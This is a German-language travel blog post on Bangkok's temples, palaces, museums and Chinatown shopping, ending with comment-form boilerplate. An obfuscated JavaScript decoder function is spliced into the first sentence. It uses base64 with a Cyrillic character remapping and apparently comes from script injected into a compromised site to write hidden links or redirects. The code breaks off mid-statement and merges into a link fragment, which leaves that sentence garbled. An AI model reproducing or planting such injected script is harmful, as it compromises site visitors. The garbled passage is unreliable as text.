Highlights in Bangkok – Tempel & Shoppingcenter

Jedes Jahr zieht es Touristen aus aller Welt in die ca. 9 Millionen Stadt Bangkok in function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var r1=“;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand/“ title=“Thailand">Thailand. Exotik und buntes Treiben bestimmen hier den Alltag. Wohin das Auge schaut, luxuriöse Hochhäuser, Bankenviertel und Einkaufsmeilen mit farbenfroher Leuchtreklame, sowie Restaurants.

Aber auch viel Sehenswertes hat Bangkok seinen Besuchern zu bieten. 400 goldene Tempel, gehören zu den touristischen Attraktionen der Stadt. Das wohl bedeutendste Bauwerk ist der Königspalast. Zu dem gesamten Gebäudekomplex gehört auch der Wat Phra Kaeo mit dazu, gelegen am FlussChayo Pharaya. Besser bekannt aber auch als der heilige Tempel und auch als buddhistisches Zentrum der Metropole.

Bangkok (Bild: Wilfried Steinacker  / pixelio.de)
Bangkok (Bild: Wilfried Steinacker / pixelio.de)
Einen Ausflug zum Vinmanmek – Palast ist ebenfalls sehr empfehlenswert. Gebaut aus goldenem Teakholz, zählt das Gebäude zum größten der Welt. Das Herrenhaus war damals die Sommerresidenz der Königsfamilie. Im Nationalmuseum erwarten unzählige Sammlungen alter Kunstgegenstände. Kostenlose Führungen werden hier den Besuchern angeboten. Der Tempel des liegenden Buddhas, ist der Wat Po. Eine 46 Meter lange Statue aus Blattgold ziert den Tempel, welcher heute als Lehrstätte für traditionelle Massagen und Kräuterheilkunde dient.

Wer shoppen möchte, findet im Stadtteil China Town genügend Möglichkeiten. Geschäfte, kleine Läden, verwinkelte Gassen hier tobt das Leben. Kopien aller namhaften Marken, wie Uhren, Taschen und Kleidung, können hier zu günstigen Preisen gekauft werden. Basare und Märkte locken mit exotischen Gewürzen und bieten ihre Waren feil. Überall sind kleine Restaurants und Cafes, in denen man verweilen kann und den Urlaub so richtig genießen. Große Einkaufszentren und eine Auswahl an Stoffen, aber auch Silber- und Goldschmuck wird hier geboten. Bangkok bietet ideale Voraussetzungen, kulturelle Attraktionen und Shopping miteinander zu verbinden.

Für die Flugsuche kann man die Preise auf verschiedenen Onlineportalen nutzen und die Bangkok Flüge vergleichen, damit man einen möglichst günstigen Flug bekommt.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg